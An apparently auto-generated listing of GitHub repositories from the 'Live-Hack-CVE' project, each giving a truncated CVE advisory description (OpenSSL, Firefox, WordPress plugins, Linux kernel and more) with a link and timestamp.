**The LabTools WordPress plugin through 1.0 does not have proper authorisation and CSRF check in place when deleting publications, allowing any authenticated users, such as subscriber to delete arbitrary publication CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25097](https://github.com/Live-Hack-CVE/CVE-2021-25097) create time: 2022-12-27T20:14:30Z

**The PublishPress Capabilities WordPress plugin before 2.3.1, PublishPress Capabilities Pro WordPress plugin before 2.3.1 does not have authorisation and CSRF checks when updating the plugin's settings via the init hook, and does not ensure that the options to be updated belong to the plugin. As a result, unauthenticate CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25032](https://github.com/Live-Hack-CVE/CVE-2021-25032) create time: 2022-12-27T20:14:19Z

**An XSS vulnerability was discovered in python-lxml's clean module versions before 4.6.3. When disabling the safe_attrs_only and forms arguments, the Cleaner class does not remove the formaction attribute allowing for JS to bypass the sanitizer. A remote attacker could exploit this flaw to run arbitrary JS code on users CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28957](https://github.com/Live-Hack-CVE/CVE-2021-28957) create time: 2022-12-27T20:14:16Z

**Yubico pam-u2f before 1.1.1 has a logic issue that, depending on the pam-u2f configuration and the application used, could lead to a local PIN bypass. This issue does not allow user presence (touch) or cryptographic signature verification to be bypassed, so an attacker would still need to physically possess and interac CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31924](https://github.com/Live-Hack-CVE/CVE-2021-31924) create time: 2022-12-27T20:14:12Z

**Out of bounds write in ANGLE in Google Chrome prior to 91.0.4472.101 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30547](https://github.com/Live-Hack-CVE/CVE-2021-30547) create time: 2022-12-27T20:13:42Z

**Mozilla developers reported memory safety bugs present in Firefox 88 and Firefox ESR 78.11. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Thunderbird < 78.11, Firefox < 89, and Fire CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29967](https://github.com/Live-Hack-CVE/CVE-2021-29967) create time: 2022-12-27T20:13:30Z

**fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an unprivileged user, aka CID-8cae8cd89f05. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33909](https://github.com/Live-Hack-CVE/CVE-2021-33909) create time: 2022-12-27T19:43:18Z

**The IP2Location Country Blocker WordPress plugin before 2.26.5 does not have authorisation and CSRF checks in the ip2location_country_blocker_save_rules AJAX action, allowing any authenticated users, such as subscriber to call it and block arbitrary country, or block all of them at once, preventing users from accessing CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25095](https://github.com/Live-Hack-CVE/CVE-2021-25095) create time: 2022-12-27T19:42:16Z

**If Thunderbird was configured to use STARTTLS for an IMAP connection, and an attacker injected IMAP server responses prior to the completion of the STARTTLS handshake, then Thunderbird didn't ignore the injected data. This could have resulted in Thunderbird showing incorrect information, for example the attacker could CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29969](https://github.com/Live-Hack-CVE/CVE-2021-29969) create time: 2022-12-27T19:42:02Z

**A malicious webpage could have triggered a use-after-free, memory corruption, and a potentially exploitable crash. *This bug could only be triggered when accessibility was enabled.*. This vulnerability affects Thunderbird < 78.12, Firefox ESR < 78.12, and Firefox < 90. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29970](https://github.com/Live-Hack-CVE/CVE-2021-29970) create time: 2022-12-27T19:41:51Z

**Mozilla developers reported memory safety bugs present in code shared between Firefox and Thunderbird. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Thunderbird < 78.12, Firefox ESR CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29976](https://github.com/Live-Hack-CVE/CVE-2021-29976) create time: 2022-12-27T19:41:48Z

**Uninitialized memory in a canvas object could have caused an incorrect free() leading to memory corruption and a potentially exploitable crash. This vulnerability affects Thunderbird < 78.13, Thunderbird < 91, Firefox ESR < 78.13, and Firefox < 91. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29980](https://github.com/Live-Hack-CVE/CVE-2021-29980) create time: 2022-12-27T19:41:44Z

**Instruction reordering resulted in a sequence of instructions that would cause an object to be incorrectly considered during garbage collection. This led to memory corruption and a potentially exploitable crash. This vulnerability affects Thunderbird < 78.13, Thunderbird < 91, Firefox ESR < 78.13, and Firefox < 91. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29984](https://github.com/Live-Hack-CVE/CVE-2021-29984) create time: 2022-12-27T19:41:41Z

**A use-after-free vulnerability in media channels could have led to memory corruption and a potentially exploitable crash. This vulnerability affects Thunderbird < 78.13, Thunderbird < 91, Firefox ESR < 78.13, and Firefox < 91. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29985](https://github.com/Live-Hack-CVE/CVE-2021-29985) create time: 2022-12-27T19:41:37Z

**Firefox incorrectly treated an inline list-item element as a block element, resulting in an out of bounds read or memory corruption, and a potentially exploitable crash. This vulnerability affects Thunderbird < 78.13, Thunderbird < 91, Firefox ESR < 78.13, and Firefox < 91. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29988](https://github.com/Live-Hack-CVE/CVE-2021-29988) create time: 2022-12-27T19:41:23Z

**A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable direc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3996](https://github.com/Live-Hack-CVE/CVE-2021-3996) create time: 2022-12-27T19:41:20Z

**A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its st CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3995](https://github.com/Live-Hack-CVE/CVE-2021-3995) create time: 2022-12-27T19:41:17Z

**A suspected race condition when calling getaddrinfo led to memory corruption and a potentially exploitable crash. *Note: This issue only affected Linux operating systems. Other operating systems are unaffected.* This vulnerability affects Thunderbird < 78.13, Thunderbird < 91, Firefox ESR < 78.13, and Firefox < 91. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29986](https://github.com/Live-Hack-CVE/CVE-2021-29986) create time: 2022-12-27T19:40:38Z

**Heap-based buffer overflow in sqbaselib.cpp in SQUIRREL 3.2 due to lack of a certain sq_reservestack call. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30292](https://github.com/Live-Hack-CVE/CVE-2022-30292) create time: 2022-12-27T20:18:33Z

**A flaw was found in the REST API. An improperly handled REST API call could allow any logged user to elevate privileges up to the system account. This affects StarWind Command Center build 6003 v2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23858](https://github.com/Live-Hack-CVE/CVE-2022-23858) create time: 2022-12-27T20:18:30Z

**Unisphere for PowerMax versions prior to 9.2.2.2 contains a privilege escalation vulnerability. An adjacent malicious user could potentially exploit this vulnerability to escalate their privileges and access functionalities they do not have access to. CVE-2022-31233 addresses the partial fix in CVE-2021-36338. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36338](https://github.com/Live-Hack-CVE/CVE-2021-36338) create time: 2022-12-27T20:18:23Z

**Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21954. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21970](https://github.com/Live-Hack-CVE/CVE-2022-21970) create time: 2022-12-27T20:17:37Z

**FlyteAdmin is the control plane for the data processing platform Flyte. Users who enable the default Flyte’s authorization server without changing the default clientid hashes will be exposed to the public internet. In an effort to make enabling authentication easier for Flyte administrators, the default configuration f CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39273](https://github.com/Live-Hack-CVE/CVE-2022-39273) create time: 2022-12-27T20:17:27Z

**client_golang is the instrumentation library for Go applications in Prometheus, and the promhttp package in client_golang provides tooling around HTTP servers and clients. In client_golang prior to version 1.11.1, HTTP server is susceptible to a Denial of Service through unbounded cardinality, and potential memory exha CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21698](https://github.com/Live-Hack-CVE/CVE-2022-21698) create time: 2022-12-27T20:17:23Z

**Due to insufficient input validation, SAP NetWeaver Application Server ABAP and ABAP Platform allows an attacker with high level privileges to use a remote enabled function to delete a file which is otherwise restricted. On successful exploitation an attacker can completely compromise the integrity and availability of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41214](https://github.com/Live-Hack-CVE/CVE-2022-41214) create time: 2022-12-27T20:17:16Z

**Insufficiently protected credentials for Intel(R) AMT and Intel(R) Standard Manageability may allow an unauthenticated user to potentially enable information disclosure and escalation of privilege via network access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30601](https://github.com/Live-Hack-CVE/CVE-2022-30601) create time: 2022-12-27T20:17:13Z

**Insufficiently protected credentials for Intel(R) AMT and Intel(R) Standard Manageability may allow a privileged user to potentially enable information disclosure via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30944](https://github.com/Live-Hack-CVE/CVE-2022-30944) create time: 2022-12-27T20:17:09Z

**Untrusted Search Path vulnerability in LiteSpeed Technologies OpenLiteSpeed Web Server and LiteSpeed Web Server Container allows Privilege Escalation. This affects versions from 1.6.15 before 1.7.16.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0074](https://github.com/Live-Hack-CVE/CVE-2022-0074) create time: 2022-12-27T20:17:02Z

**Directory Traversal vulnerability in LiteSpeed Technologies OpenLiteSpeed Web Server and LiteSpeed Web Server dashboards allows Path Traversal. This affects versions from 1.5.11 through 1.5.12, from 1.6.5 through 1.6.20.1, from 1.7.0 before 1.7.16.1 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0072](https://github.com/Live-Hack-CVE/CVE-2022-0072) create time: 2022-12-27T20:16:45Z

**Improper Input Validation vulnerability in LiteSpeed Technologies OpenLiteSpeed Web Server and LiteSpeed Web Server dashboards allows Command Injection. This affects 1.7.0 versions before 1.7.16.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0073](https://github.com/Live-Hack-CVE/CVE-2022-0073) create time: 2022-12-27T20:16:41Z

**Improper neutralization in the Intel(R) Data Center Manager software before version 4.1 may allow an authenticated user to potentially enable escalation of privilege via adjacent access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21225](https://github.com/Live-Hack-CVE/CVE-2022-21225) create time: 2022-12-27T20:16:34Z

**multipath-tools 0.7.0 through 0.9.x before 0.9.2 allows local users to obtain root access, as exploited alone or in conjunction with CVE-2022-41973. Local users able to write to UNIX domain sockets can bypass access controls and manipulate the multipath setup. This can lead to local privilege escalation to root. This o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41974](https://github.com/Live-Hack-CVE/CVE-2022-41974) create time: 2022-12-27T20:16:31Z

**multipath-tools 0.7.7 through 0.9.x before 0.9.2 allows local users to obtain root access, as exploited in conjunction with CVE-2022-41974. Local users able to access /dev/shm can change symlinks in multipathd due to incorrect symlink handling, which could lead to controlled file writes outside of the /dev/shm director CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41973](https://github.com/Live-Hack-CVE/CVE-2022-41973) create time: 2022-12-27T20:16:28Z

**The ESL (Electronic Shelf Label) protocol, as implemented by (for example) the OV80e934802 RF transceiver on the ETAG-2130-V4.3 20190629 board, does not use authentication, which allows attackers to change label values via 433 MHz RF signals, as demonstrated by disrupting the organization of a hospital storage unit, or CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45914](https://github.com/Live-Hack-CVE/CVE-2022-45914) create time: 2022-12-27T20:16:24Z

**ILIAS before 7.16 allows External Control of File Name or Path. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45918](https://github.com/Live-Hack-CVE/CVE-2022-45918) create time: 2022-12-27T20:16:20Z

**ILIAS before 7.16 allows XSS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45916](https://github.com/Live-Hack-CVE/CVE-2022-45916) create time: 2022-12-27T20:16:17Z

**ILIAS before 7.16 has an Open Redirect. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45917](https://github.com/Live-Hack-CVE/CVE-2022-45917) create time: 2022-12-27T20:16:13Z

**ILIAS before 7.16 allows OS Command Injection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45915](https://github.com/Live-Hack-CVE/CVE-2022-45915) create time: 2022-12-27T20:16:09Z

**Command injection vulnerability was discovered in Netgear R6200 v2 firmware through R6200v2-V1.0.3.12 via binary /sbin/acos_service that could allow remote authenticated attackers the ability to modify values in the vulnerable parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30079](https://github.com/Live-Hack-CVE/CVE-2022-30079) create time: 2022-12-27T20:16:06Z

**A post-auth read-only SQL injection vulnerability allows users to read non-sensitive configuration database contents in the User Portal of Sophos Firewall releases older than version 19.5 GA. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3711](https://github.com/Live-Hack-CVE/CVE-2022-3711) create time: 2022-12-27T20:16:03Z

**A stored XSS vulnerability allows admin to super-admin privilege escalation in the Webadmin import group wizard of Sophos Firewall releases older than version 19.5 GA. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3709](https://github.com/Live-Hack-CVE/CVE-2022-3709) create time: 2022-12-27T20:15:13Z

**A maliciously crafted PKT file when consumed through SubassemblyComposer.exe application could lead to memory corruption vulnerability by read access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41301](https://github.com/Live-Hack-CVE/CVE-2022-41301) create time: 2022-12-27T20:15:10Z

**A flaw was found in the QEMU virtio-fs shared file system daemon (virtiofsd) implementation. This flaw is strictly related to CVE-2018-13405. A local guest user can create files in the directories shared by virtio-fs with unintended group ownership in a scenario where a directory is SGID to a certain group and is writa CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0358](https://github.com/Live-Hack-CVE/CVE-2022-0358) create time: 2022-12-27T20:15:06Z

**Xenstore: guests can let run xenstored out of memory T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Malicious guests can cause xenstored to allocate vast amounts of memory, eventually resulting in a Denial of Service (DoS) of xenstored. T CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42314](https://github.com/Live-Hack-CVE/CVE-2022-42314) create time: 2022-12-27T20:14:40Z

**A local privilege escalation (PE) vulnerability exists in Palo Alto Networks Cortex XDR agent software on Windows that enables an authenticated local user with file creation privilege in the Windows root directory (such as C:\) to execute a program with elevated privileges. This issue impacts all versions of Cortex XDR CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0026](https://github.com/Live-Hack-CVE/CVE-2022-0026) create time: 2022-12-27T20:14:23Z

**The root cause of this vulnerability is that the ioctl$DRM_IOCTL_MODE_DESTROY_DUMB can decrease refcount of *drm_vgem_gem_object *(created in *vgem_gem_dumb_create*) concurrently, and *vgem_gem_dumb_create *will access the freed drm_vgem_gem_object. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1419](https://github.com/Live-Hack-CVE/CVE-2022-1419) create time: 2022-12-27T19:43:15Z

**py-cord is a an API wrapper for Discord written in Python. Bots creating using py-cord version 2.0.0 are vulnerable to remote shutdown if they are added to the server with the `application.commands` scope without the `bot` scope. Currently, it appears that all public bots that use slash commands are affected. This issu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36024](https://github.com/Live-Hack-CVE/CVE-2022-36024) create time: 2022-12-27T19:42:44Z

**** DISPUTED ** UBports Ubuntu Touch 16.04 allows the screen-unlock passcode to be used for a privileged shell via Sudo. This passcode is only four digits, far below typical length/complexity for a user account's password. NOTE: a third party states "The described attack cannot be executed as demonstrated." CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40297](https://github.com/Live-Hack-CVE/CVE-2022-40297) create time: 2022-12-27T19:42:40Z

**sshd in OpenSSH 3.6.1p2 and earlier, when PermitRootLogin is disabled and using PAM keyboard-interactive authentication, does not insert a delay after a root login attempt with the correct password, which makes it easier for remote attackers to use timing differences to determine if the password step of a multi-step au CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2003-1562](https://github.com/Live-Hack-CVE/CVE-2003-1562) create time: 2022-12-27T18:51:13Z

**OpenSSH-portable (OpenSSH) 3.6.1p1 and earlier with PAM support enabled immediately sends an error message when a user does not exist, which allows remote attackers to determine valid usernames via a timing attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2003-0190](https://github.com/Live-Hack-CVE/CVE-2003-0190) create time: 2022-12-27T18:51:02Z

**The OZWPAN driver in the Linux kernel through 4.0.5 relies on an untrusted length field during packet parsing, which allows remote attackers to obtain sensitive information from kernel memory or cause a denial of service (out-of-bounds read and system crash) via a crafted packet. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-4004](https://github.com/Live-Hack-CVE/CVE-2015-4004) create time: 2022-12-27T18:54:51Z

**The PKCS#7 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not properly handle a lack of outer ContentInfo, which allows attackers to cause a denial of service (NULL pointer dereference and application crash) by leveraging an application that processes ar CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-0289](https://github.com/Live-Hack-CVE/CVE-2015-0289) create time: 2022-12-27T18:51:19Z

**The SSLv2 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a allows remote attackers to cause a denial of service (s2_lib.c assertion failure and daemon exit) via a crafted CLIENT-MASTER-KEY message. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-0293](https://github.com/Live-Hack-CVE/CVE-2015-0293) create time: 2022-12-27T18:51:09Z

**The dtls1_listen function in d1_lib.c in OpenSSL 1.0.2 before 1.0.2a does not properly isolate the state information of independent data streams, which allows remote attackers to cause a denial of service (application crash) via crafted DTLS traffic, as demonstrated by DTLS 1.0 traffic to a DTLS 1.2 server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-0207](https://github.com/Live-Hack-CVE/CVE-2015-0207) create time: 2022-12-27T18:50:58Z

**The ASN1_item_ex_d2i function in crypto/asn1/tasn_dec.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not reinitialize CHOICE and ADB data structures, which might allow attackers to cause a denial of service (invalid write operation and memory corruption) by leveragin CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-0287](https://github.com/Live-Hack-CVE/CVE-2015-0287) create time: 2022-12-27T18:50:54Z

**Integer underflow in the EVP_DecodeUpdate function in crypto/evp/encode.c in the base64-decoding implementation in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted base64 da CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-0292](https://github.com/Live-Hack-CVE/CVE-2015-0292) create time: 2022-12-27T18:50:51Z

**The ssl3_client_hello function in s3_clnt.c in OpenSSL 1.0.2 before 1.0.2a does not ensure that the PRNG is seeded before proceeding with a handshake, which makes it easier for remote attackers to defeat cryptographic protection mechanisms by sniffing the network and then conducting a brute-force attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-0285](https://github.com/Live-Hack-CVE/CVE-2015-0285) create time: 2022-12-27T18:50:47Z

**The ASN1_TYPE_cmp function in crypto/asn1/a_type.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not properly perform boolean-type comparisons, which allows remote attackers to cause a denial of service (invalid read operation and application crash) via a crafted X.50 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-0286](https://github.com/Live-Hack-CVE/CVE-2015-0286) create time: 2022-12-27T18:50:44Z

**The multi-block feature in the ssl3_write_bytes function in s3_pkt.c in OpenSSL 1.0.2 before 1.0.2a on 64-bit x86 platforms with AES NI support does not properly handle certain non-blocking I/O cases, which allows remote attackers to cause a denial of service (pointer corruption and application crash) via unspecified v CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-0290](https://github.com/Live-Hack-CVE/CVE-2015-0290) create time: 2022-12-27T18:50:40Z

**The Tivoli Storage Manager (TSM) password may be displayed in plain text via application trace output while application tracing is enabled. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0371](https://github.com/Live-Hack-CVE/CVE-2016-0371) create time: 2022-12-27T18:53:47Z

**An oracle protection mechanism in the get_client_master_key function in s2_srvr.c in the SSLv2 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a overwrites incorrect MASTER-KEY bytes during use of export cipher suites, which makes it easier for remote attackers CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0704](https://github.com/Live-Hack-CVE/CVE-2016-0704) create time: 2022-12-27T18:51:16Z

**The DH_check_pub_key function in crypto/dh/dh_check.c in OpenSSL 1.0.2 before 1.0.2f does not ensure that prime numbers are appropriate for Diffie-Hellman (DH) key exchange, which makes it easier for remote attackers to discover a private DH exponent by making multiple handshakes with a peer that chose an inappropriate CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0701](https://github.com/Live-Hack-CVE/CVE-2016-0701) create time: 2022-12-27T18:51:05Z

**Double free vulnerability in the dsa_priv_decode function in crypto/dsa/dsa_ameth.c in OpenSSL 1.0.1 before 1.0.1s and 1.0.2 before 1.0.2g allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a malformed DSA private key. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0705](https://github.com/Live-Hack-CVE/CVE-2016-0705) create time: 2022-12-27T18:50:36Z

**The MOD_EXP_CTIME_COPY_FROM_PREBUF function in crypto/bn/bn_exp.c in OpenSSL 1.0.1 before 1.0.1s and 1.0.2 before 1.0.2g does not properly consider cache-bank access times during modular exponentiation, which makes it easier for local users to discover RSA keys by running a crafted application on the same Intel Sandy B CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0702](https://github.com/Live-Hack-CVE/CVE-2016-0702) create time: 2022-12-27T18:50:33Z

**The get_client_master_key function in s2_srvr.c in the SSLv2 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a accepts a nonzero CLIENT-MASTER-KEY CLEAR-KEY-LENGTH value for an arbitrary cipher, which allows man-in-the-middle attackers to determine the MASTER-KE CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0703](https://github.com/Live-Hack-CVE/CVE-2016-0703) create time: 2022-12-27T18:50:17Z

**The fmtstr function in crypto/bio/b_print.c in OpenSSL 1.0.1 before 1.0.1s and 1.0.2 before 1.0.2g improperly calculates string lengths, which allows remote attackers to cause a denial of service (overflow and out-of-bounds read) or possibly have unspecified other impact via a long string, as demonstrated by a large am CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0799](https://github.com/Live-Hack-CVE/CVE-2016-0799) create time: 2022-12-27T18:50:13Z

**Memory leak in the SRP_VBASE_get_by_user implementation in OpenSSL 1.0.1 before 1.0.1s and 1.0.2 before 1.0.2g allows remote attackers to cause a denial of service (memory consumption) by providing an invalid username in a connection attempt, related to apps/s_server.c and crypto/srp/srp_vfy.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0798](https://github.com/Live-Hack-CVE/CVE-2016-0798) create time: 2022-12-27T18:50:10Z

**Untrusted search path vulnerability in ssh-agent.c in ssh-agent in OpenSSH before 7.4 allows remote attackers to execute arbitrary local PKCS#11 modules by leveraging control over a forwarded agent-socket. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-10009](https://github.com/Live-Hack-CVE/CVE-2016-10009) create time: 2022-12-27T18:50:07Z

**IBM Security Guardium Big Data Intelligence (SonarG) 4.0 stores sensitive information in cleartext within a resource that might be accessible to another control sphere. IBM X-Force ID: 1610141. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4314](https://github.com/Live-Hack-CVE/CVE-2019-4314) create time: 2022-12-27T18:52:43Z

**IBM Security Guardium Big Data Intelligence (SonarG) 4.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 161418. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4339](https://github.com/Live-Hack-CVE/CVE-2019-4339) create time: 2022-12-27T18:52:40Z

**IBM Security Guardium Big Data Intelligence (SonarG) 4.0 does not set the secure attribute for cookies in HTTPS sessions, which could cause the user agent to send those cookies in plaintext over an HTTP session. IBM X-Force ID: 161210. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4330](https://github.com/Live-Hack-CVE/CVE-2019-4330) create time: 2022-12-27T18:52:36Z

**IBM Security Guardium Big Data Intelligence (SonarG) 4.0 discloses sensitive information to unauthorized users. The information can be used to mount further attacks on the system. IBM X-Force ID: 161037. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4311](https://github.com/Live-Hack-CVE/CVE-2019-4311) create time: 2022-12-27T18:52:33Z

**Command Injection vulnerability in McAfee Enterprise Security Manager (ESM) prior to 11.2.0 and prior to 10.4.0 allows authenticated user to execute arbitrary code via specially crafted parameters. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3630](https://github.com/Live-Hack-CVE/CVE-2019-3630) create time: 2022-12-27T18:51:52Z

**Command Injection vulnerability in McAfee Enterprise Security Manager (ESM) prior to 11.2.0 and prior to 10.4.0 allows authenticated user to execute arbitrary code via specially crafted parameters. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3631](https://github.com/Live-Hack-CVE/CVE-2019-3631) create time: 2022-12-27T18:51:49Z

**Directory Traversal vulnerability in McAfee Enterprise Security Manager (ESM) prior to 11.2.0 and prior to 10.4.0 allows authenticated user to gain elevated privileges via specially crafted input. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3632](https://github.com/Live-Hack-CVE/CVE-2019-3632) create time: 2022-12-27T18:51:45Z

**Buffer overflow in McAfee Data Loss Prevention (DLPe) for Windows 11.x prior to 11.3.2.8 allows local user to cause the Windows operating system to "blue screen" via an encrypted message sent to DLPe which when decrypted results in DLPe reading unallocated memory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3634](https://github.com/Live-Hack-CVE/CVE-2019-3634) create time: 2022-12-27T18:51:41Z

**Buffer overflow in McAfee Data Loss Prevention (DLPe) for Windows 11.x prior to 11.3.2.8 allows local user to cause the Windows operating system to "blue screen" via a carefully constructed message sent to DLPe which bypasses DLPe internal checks and results in DLPe reading unallocated memory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3633](https://github.com/Live-Hack-CVE/CVE-2019-3633) create time: 2022-12-27T18:51:38Z

**A security feature bypass vulnerability exists in the way Microsoft ASP.NET Core parses encoded cookie names.The ASP.NET Core cookie parser decodes entire cookie strings which could allow a malicious attacker to set a second cookie with the name being percent encoded.The security update addresses the vulnerability by f CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1045](https://github.com/Live-Hack-CVE/CVE-2020-1045) create time: 2022-12-27T18:57:27Z

**A CWE-306: Missing Authentication for Critical Function vulnerability exists in Easergy T300 (with firmware 2.7 and older) that could cause a wide range of problems, including information exposure, denial of service, and command execution when access to a resource from an attacker is not restricted or incorrectly restr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7561](https://github.com/Live-Hack-CVE/CVE-2020-7561) create time: 2022-12-27T18:54:06Z

**The npm package "tar" (aka node-tar) before versions 4.4.18, 5.0.10, and 6.1.9 has an arbitrary file creation/overwrite and arbitrary code execution vulnerability. node-tar aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that e CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37712](https://github.com/Live-Hack-CVE/CVE-2021-37712) create time: 2022-12-27T19:01:14Z

**The npm package "tar" (aka node-tar) before versions 4.4.16, 5.0.8, and 6.1.7 has an arbitrary file creation/overwrite and arbitrary code execution vulnerability. node-tar aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that ex CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37701](https://github.com/Live-Hack-CVE/CVE-2021-37701) create time: 2022-12-27T19:01:10Z

**Vulnerability of pointers being incorrectly used during data transmission in the video framework. Successful exploitation of this vulnerability may affect confidentiality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40012](https://github.com/Live-Hack-CVE/CVE-2021-40012) create time: 2022-12-27T18:54:47Z

